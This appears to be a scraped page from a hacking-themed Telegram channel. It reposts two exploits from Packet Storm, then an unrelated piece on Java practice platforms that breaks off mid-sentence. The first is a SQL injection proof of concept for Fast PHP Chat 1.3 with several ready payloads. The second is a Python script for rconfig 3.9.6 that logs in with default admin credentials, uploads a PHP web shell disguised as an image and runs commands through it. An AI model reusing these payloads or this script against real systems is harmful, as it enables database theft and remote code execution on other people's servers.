Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Fast PHP Chat 1.3 SQL Injection

https://1.bp.blogspot.com/-3PgjWVftdQ0/WWlvP-R2mXI/AAAAAAAAIM8/iBQyafDa-iYc-AHcRZlLffBv9_pWsP_-gCLcBGAs/s1600/h30.png
Fast PHP Chat version 1.3 suffers from a remote SQL injection vulnerability.

MD5 | a327483a86ab5acaf1b709b62d3c730d

Download
# Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection
# Date: 15/04/2021
# Exploit Author: Fatih Coskun
# Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076
# Version: 1.3
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'my_item_search' parameter.
====================================================

# PoC : SQLi :

POST /chat/edit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/chat/edit.php
Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c;
_ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
my_item_search=test&submit_search=Search
Parameter : my_item_search

Type : boolean-based blind
Demo : https://localhost/chat/edit.php
Payload : my_item_search=-2454' OR 6122=6122#&submit=Search

Type : error-based
Demo : https://localhost/chat/edit.php
Payload : my_item_search=test' AND (SELECT 3274 FROM(SELECT
COUNT(*),CONCAT(0x71706a7071,(SELECT
(ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&submit=Search

Type : stacked queries
Demo : https://localhost/chat/edit.php
Payload : my_item_search=test';SELECT SLEEP(5)#&submit=Search

Type : AND/OR time-based blind
Demo : https://localhost/login-script-demo/users.php
Payload : my_item_search=test' OR SLEEP(5)-- mlod&submit=Search

Type : UNION query
Demo : https://localhost/chat/edit.php
Payload : my_item_search=test' UNION ALL SELECT
NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&submit=Search

====================================================

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
rconfig 3.9.6 Shell Upload

https://2.bp.blogspot.com/-n3YJZo98ptc/WWlvfHNo4ZI/AAAAAAAAIP8/W2JyxBpYTHMTjkJx5zl91eYOlgUDpw8egCLcBGAs/s1600/h84.png
rconfig versions 3.9.6 and below shell upload exploit. This is a variant of the flaw discovered in the same version by Murat Seker in March of 2021.

MD5 | b7f8097627500be08ead4a0bbb6d61eb

Download
# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
# Exploit Author: Vishwaraj Bhattrai
# Date: 18/04/2021
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <=
# Tested against Server Host: Linux+XAMPP

import requests
import sys
s = requests.Session()

host=sys.argv[1] #Enter the hostname
cmd=sys.argv[2] #Enter the command

def exec_cmd(cmd,host):
print "[+]Executing command"
path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
response=requests.get(path)
print response.text
print "\n[+]You can access shell via below path"
print path

def file_upload(cmd,host):
print "[+]Bypassing file upload"
burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
exec_cmd(cmd,host)
def login(host,cmd):
print "[+]Logging in"
burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}

burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
file_upload(cmd,host)

login(host,cmd)


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Top Choices for Java Coding Practice

To get better at anything you do, you’ll need to do it repeatedly. The same applies to Java programming, and the more you do it, the better you become. It is generally known practice makes perfect. However, you need to learn Java from scratch before you think of practicing regularly.

A great way to develop new ways of thinking is to try coding. With the many available options and training tools, selecting an ideal option can be a little bit tricky. However, we have provided reliable platforms where you can get knowledge and daily Java programming practice. Read on!<o:p Java Practice Platforms<o:pCodeGym<o:phttps://1.bp.blogspot.com/-gUpeNuh0CWM/YIA_bmaOcPI/AAAAAAAAvbY/bPUraAZ6SwgwKNvaaFpQ6bhjSn8rZ0d1wCLcBGAsYHQ/s16000/image001.jpg Price<o:pCodeGym has a free plan in which you will get community content and answers to your questions about learning Java. For complete access to the platform, you’ll need the Premium subscription.<o:p

Premium: Cost $49 per month, and you’ll get features like task requirements, IntelliJ IDEA plugin, task recommendations, and access to every CodeGym quests.<o:p

Premium Pro:Cost $99 per month, and it includes all the Premium plan features, plus analysis of coding styles and ReCheck features.<o:p Description<o:pCodeGym is an online gamified Java programming course that features over 1,200 different tasks. Are you looking for a place to practice Java? CodeGym is what you’re looking for. There are so many good books that you can use to learn Java but to become a professional you will need more than just books.<o:p

Learning Java and becoming a programmer on CodeGym involves 20% learning the basics of Java and 80% of actual practice. There’s no better way to become a Java developer. Another interesting thing is that there are different tasks on the platform to complete. Even though there are many tasks, they are all clear, and you’d complete them with ease. With this, you can get all the experience you need for any job.<o:p

Learning Java on CodeGym is entertaining because it utilizes recent techniques to enhance learning and make it more productive and interesting. This platform is ideal and suitable for beginners because it will help them learn Java.<o:p Cyber-Dojo<o:phttps://1.bp.blogspot.com/-yXnuwxFwNRk/YIA_gebExVI/AAAAAAAAvbc/OEPahUxqjAcJNIaadC5b-SRe3DNg-jQewCLcBGAsYHQ/s16000/image003.jpg Price<o:pTo use Cyber-Dojo in a commercial organization, a license will be required. However, non-commercial use of this platform is completely free.<o:p Description<o:pCyber-Dojo is also a gamified learning platform that offers various challenges and exercises to help in practicing different programming languages. It also provides testing frameworks for each of the programming languages. The most popular languages you’ll find on this platform include Python, JavaScript, and Java.<o:p

The tasks have examples to give users an idea of how to solve them. Also, students can learn in groups or individually by selecting exercises to practice their preferred programming language. In each learning session, the student can write Java code and see their test results. Green color indicates pass, amber indicates the presence of syntax errors, and red means fail.<o:p

Cyber-Dojo is designed mainly to help people improve their skills.<o:p CodeChef<o:phttps://1.bp.blogspot.com/-X84jdfyPumQ/YIA_lF_xfHI/AAAAAAAAvbg/pkWpcxnXmcQJiG1hECpnldLQS5KEPfiNQCLcBGAsYHQ/s16000/image005.jpg Price<o:pCodeChef is a free platform.<o:p Description<o:pCodeChef is a programming community that is globally recognized for [...]